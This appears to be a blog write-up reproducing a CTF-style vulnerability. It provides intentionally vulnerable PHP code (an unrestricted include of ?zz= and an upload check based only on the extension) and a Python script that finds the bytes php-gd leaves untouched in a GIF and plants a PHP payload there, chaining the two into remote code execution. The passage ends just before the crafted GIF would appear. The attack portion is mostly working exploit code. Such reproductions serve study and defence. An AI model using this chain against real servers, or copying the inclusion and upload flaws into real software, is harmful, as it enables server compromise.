While reading past writeups I came across this vulnerability. It looked interesting, so I decided to reproduce it.
References:
http://www.freebuf.com/articles/web/54086.html
https://www.hackersb.cn/hacker/123.html
I wanted to find the source code used in the original competition, but it does not seem to be available, so I had no choice but to write my own code implementing the basic functionality.
index.php
```php
<?php
//error_reporting(0);
// Local file inclusion: whatever path is passed in ?zz= is included and executed as PHP.
if(isset($_GET['zz'])) {
    @include($_GET['zz']);
}
else
    include('submit.php');
?>
```
submit.php
```html
<META http-equiv="content-type" content="text/html; charset=utf8">
<form action="upload.php" method="post" enctype="multipart/form-data">
    <label for="file">filename:</label>
    <input type="file" name="file" id="file">
    <br>
    <input type="submit" name="submit" value="submit">
</form>
Please upload a jpg, gif or png file, thanks~
```
upload.php
```php
<?php
// 16-character random filename so the stored path cannot be guessed in advance.
function get_random_string(){
    $random_string = '';
    $str = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890";
    for($i = 0; $i < 16; $i++){
        $random_string .= substr($str, rand(0, 61), 1);
    }
    return $random_string;
}

if(isset($_POST['submit'])){
    $uploaded_name = $_FILES['file']['name'];
    // Extension check only: the text after the last dot must be jpg, gif or png.
    $uploaded_ext = substr($uploaded_name, strrpos($uploaded_name, '.') + 1);
    if($uploaded_ext=='jpg'||$uploaded_ext=='gif'||$uploaded_ext=='png'){
        $target_path = './Err0r/'.get_random_string().'.'.$uploaded_ext;
        if(!move_uploaded_file($_FILES['file']['tmp_name'], $target_path)){
            echo "<script>alert('move failed!');parent.location.href='index.php';</script>";
        }
        else{
            // GD decodes the file to prove it is a real image. The decoded image is never
            // written back, so the bytes on disk are exactly what the client uploaded.
            if($uploaded_ext=='jpg')
                $im = imagecreatefromjpeg($target_path);
            else if($uploaded_ext=='gif')
                $im = imagecreatefromgif($target_path);
            else
                $im = imagecreatefrompng($target_path);
            if(!$im){
                // Note: a file GD rejects is reported but not deleted from ./Err0r/.
                echo "<script>alert('jpg,png,gif Plz!');parent.location.href='index.php';</script>";
                return;
            }
            // The random target path is echoed back, which is all index.php?zz= needs.
            echo "<script>alert('$target_path is moved successfully!');parent.location.href='index.php';</script>";
            return;
        }
    }
    echo "<script>alert('jpg,png,gif Plz!');parent.location.href='index.php';</script>";
}
?>
```
Take two GIF images that have both been processed by php-gd and compare them byte by byte: wherever the two outputs are identical, those bytes are data the conversion does not rewrite. Code injected into those regions therefore survives the re-encode, and once the stored file is pulled in through the include in index.php (index.php?zz=Err0r/<random name>.gif, with the name taken from the alert upload.php prints), the PHP inside it is executed, giving remote code execution. One caveat for the reproduction above: upload.php only calls imagecreatefromgif() to validate the upload and never saves GD's output, so the file on disk is byte-for-byte what was uploaded; the comparison step matters when the server stores GD's re-encoded image, which is the situation the technique was written for.
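The comparison step, written out as an added example (my own script, not code from the original post or from the referenced articles): given the bytes of two GD-processed files, list the runs that are byte-identical at the same offset, then overwrite the first run that lies past the 13-byte header and logical screen descriptor and is long enough to hold a PHP payload. The 1x1 GIF and the "after" file are constructed by hand here (the second one simulates an encoder rewriting the compressed pixel bytes at offsets 31-32); in real use both inputs are files GD actually wrote, and the patched result must be re-checked with imagecreatefromgif(), since this script does not decode LZW and cannot tell whether the overwritten bytes still parse. The names stable_regions, inject_payload, HEADER_LEN and PAYLOAD are mine.

```python
"""Find the bytes php-gd leaves untouched and put a PHP payload there."""
from typing import List, Optional, Tuple

# Hand-built 1x1 GIF89a (constructed for this example; not an image from the original post).
MINIMAL_GIF = (
    b"GIF89a"                                    # header, offsets 0-5
    b"\x01\x00\x01\x00\x80\x00\x00"              # logical screen descriptor: 1x1, 2-colour global table, 6-12
    b"\x00\x00\x00\xff\xff\xff"                  # global colour table: black, white, 13-18
    b"\x2c\x00\x00\x00\x00\x01\x00\x01\x00\x00"  # image descriptor, 19-28
    b"\x02"                                      # LZW minimum code size, 29
    b"\x02\x44\x01"                              # one compressed data sub-block, 30-32
    b"\x00"                                      # block terminator, 33
    b"\x3b"                                      # trailer ';', 34
)

# Simulated "second pass through GD": the same file with the compressed pixel bytes
# rewritten (offsets 31-32). Constructed stand-in; real input is a file GD actually saved.
SIMULATED_GD_OUTPUT = MINIMAL_GIF[:31] + b"\x8c\x03" + MINIMAL_GIF[33:]

HEADER_LEN = 13  # 'GIF89a' + logical screen descriptor; overwriting these breaks every decoder

PAYLOAD = b"<?php echo 1;?>"  # 15 bytes; a real web shell needs a bigger image, i.e. a longer stable run


def stable_regions(before: bytes, after: bytes, min_len: int = 1) -> List[Tuple[int, int]]:
    """Return (offset, length) runs where both files hold identical bytes at the same offset.

    Bytes past the shorter file's end are never counted as stable.
    """
    regions: List[Tuple[int, int]] = []
    start: Optional[int] = None
    n = min(len(before), len(after))
    for i in range(n + 1):
        same = i < n and before[i] == after[i]
        if same and start is None:
            start = i
        elif not same and start is not None:
            if i - start >= min_len:
                regions.append((start, i - start))
            start = None
    return regions


def inject_payload(target: bytes, regions: List[Tuple[int, int]], payload: bytes,
                   skip: int = HEADER_LEN) -> Optional[Tuple[bytes, int]]:
    """Overwrite the first stable run (ignoring the first `skip` bytes) that can hold the payload.

    Returns (patched_bytes, offset), or None when no run is long enough. The file length
    is unchanged, so every offset after the payload still lines up for the decoder.
    """
    for offset, length in regions:
        start = max(offset, skip)
        end = offset + length
        if end - start >= len(payload):
            patched = bytearray(target)
            patched[start:start + len(payload)] = payload
            return bytes(patched), start
    return None


if __name__ == "__main__":
    runs = stable_regions(MINIMAL_GIF, SIMULATED_GD_OUTPUT)
    print("stable runs:", runs)
    result = inject_payload(SIMULATED_GD_OUTPUT, runs, PAYLOAD)
    if result:
        patched, at = result
        print(f"payload written at offset {at}: {patched!r}")
```

With the constructed inputs the stable runs are (0, 31) and (33, 2); after skipping the header the first run has 18 usable bytes, so the 15-byte payload lands at offset 13, inside the global colour table. Whether GD keeps those bytes on the next encode is exactly what the real second comparison has to answer; the script only tells you where to try.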
Then, adapting the PoC, I produced the following GIF: